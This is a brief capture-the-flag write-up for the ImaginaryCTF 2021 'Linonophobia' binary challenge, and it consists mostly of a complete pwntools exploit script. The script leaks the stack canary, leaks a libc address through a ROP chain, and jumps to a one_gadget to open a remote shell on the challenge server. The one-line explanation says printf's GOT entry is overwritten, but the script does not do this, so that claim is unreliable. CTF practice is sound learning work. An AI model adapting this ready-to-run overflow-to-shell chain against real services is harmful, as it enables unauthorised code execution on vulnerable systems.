[link to original writeup](https://github.com/babaiserror/ctf/tree/main/%5B210723-27%5D%20ImaginaryCTF%202021/Linonophobia)

ret2libc. It overwrites `printf@GOT` with `puts@GOT`, so when it calls `printf` it actually calls `puts` instead.

solution script:

```python
from pwn import *

libc = ELF('./libc6_2.31-0ubuntu9.1_amd64.so')
elf = ELF('./linonophobia')
r = ROP(elf)

PUTS_GOT = elf.got['puts']
PUTS_PLT = elf.plt['puts']
MAIN_PLT = elf.symbols['main']
POP_RDI = (r.find_gadget(['pop rdi', 'ret']))[0]
POP_R12_15 = (r.find_gadget(['pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret']))[0]
binsh = 0xe6c7e # from one_gadget; requires r12, r15 to be NULL

p = remote('chal.imaginaryctf.org', 42006)
p.recvline()
p.sendline(b'a'*0x108)
p.recvuntil(b'a'*0x108 + b'\n')
canary = u64(p.recv(7).rjust(8,b'\x00'))
print("canary=>" + hex(canary))
print(p.clean())

payload = b'a'*0x108 + p64(canary) + b'a'*8+ p64(POP_RDI) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
p.sendline(payload)
puts_addr = u64(p.recvline().strip().ljust(8,b"\x00"))
print("puts_addr=>" + hex(puts_addr))
print(p.clean())

libc_base = puts_addr - libc.symbols['puts']
binsh = libc_base + binsh

payload = b'a'*0x108 + p64(canary) + b'a'*8 + p64(POP_R12_15) + b'\x00'*32 + p64(binsh)
print(payload)
p.send(payload)
p.recvline()

print("========shell========")
p.send(payload)
p.clean()
p.interactive()
```